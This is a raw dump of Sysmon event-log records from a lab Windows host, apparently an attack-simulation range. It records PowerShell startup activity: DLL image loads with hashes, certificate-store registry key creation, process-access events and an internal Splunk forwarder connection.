12241200x80000000000000001530028Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530027Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530026Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530025Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530024Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530023Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530022Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530021Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530020Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 734700x80000000000000001530019Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 12241200x80000000000000001530018Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530017Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530016Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530015Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x80000000000000001530014Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\CA 734700x80000000000000001530013Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x80000000000000001530012Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x80000000000000001530011Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wintrust.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=D8CD8451D1E194230F18866AD6EFE5E7,SHA256=9977AA1287962035C24DF806DDA67F09FFE9BDF696DBA507D749C624AE1C178DtrueMicrosoft WindowsValid 734700x80000000000000001530010Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 10341000x80000000000000001530009Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530008Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbacff3d0ae5f6e457c31cbf7c94d6a2\System.Management.Automation.ni.dll10.0.14393.4350System.Management.AutomationMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationSystem.Management.Automation.dllMD5=A7509FB104105E590B3AF3F3D8EF9FBB,SHA256=98F1DF763725254FA77D85A880269ED7C3BB4CC2CB9B648C5950925D8FBA6970false-Unavailable 734700x80000000000000001530007Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001530006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001530005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000001530004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\9626a857db364c5cc8c0397184ff6f19\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=8C665AE171663A12BE10948B2BA07B86,SHA256=D552DDF56F054CE073331B359029BFEE76691EDE50C44990CCEEB44490C9F47Bfalse-Unavailable 734700x80000000000000001530003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\da20d69661026f202acad55611f1f372\System.Core.ni.dll4.8.4330.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=0AA216B359BB985E91C06D6CEC347EF2,SHA256=5EDE9B67C3A3A41FCC240B0D7F27764343BD8C1BB1EAC39F441E00C6E5066C92false-Unavailable 734700x80000000000000001530002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.500{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll4.8.4311.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=D71B052A790A577400CB572A7D4CB69B,SHA256=DE2BE5C6691862A5223BDFEFEE00F33FB6C7A5B2F6DC68124E44EB42D8D3B709false-Unavailable 354300x80000000000000001530001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.751{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64679-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 734700x80000000000000001530000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\e150e12dedbd1a8eb71660b9680a9ae7\mscorlib.ni.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=CE876D73280DFF17CF3055AB7BFE5C7E,SHA256=CC5303C0076585623C02A29F009104BD8BD4FFBA9E2FB37835289F6A7B98A2EEtrueMicrosoft CorporationValid 734700x80000000000000001529999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x80000000000000001529998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x80000000000000001529997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.484{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xf9a1c8db) 12241200x80000000000000001529996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x80000000000000001529995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=2C6E4402268C1CCB8FFF2FC7F7BD27E0,SHA256=9B01E4FC480D60A22D62EFEF9857A4371C826DCE8DED10C9E89F3224EF4526E6trueMicrosoft CorporationValid 734700x80000000000000001529994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x80000000000000001529993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 13241300x80000000000000001529992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xf9a1c8db) 12241200x80000000000000001529991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001529990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.484{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData 10341000x80000000000000001529989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}3886016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001529982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb312f3e.TMPMD5=7EFF1DDF55D96F0016BF7AC05D7CA59D,SHA256=E8AA506D87C0E68F6486C75A720FB88EDAAEE9A75D326373BCDCB164E618A3A8falsefalse - insufficient disk space 11241100x80000000000000001529981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb312f3e.TMP2021-04-21 17:30:08.484 734700x80000000000000001529980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValid 254200x80000000000000001529979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5C9J3NFXGAY8QJS8VTR6.temp2021-04-19 12:25:37.5782021-04-21 17:30:08.484 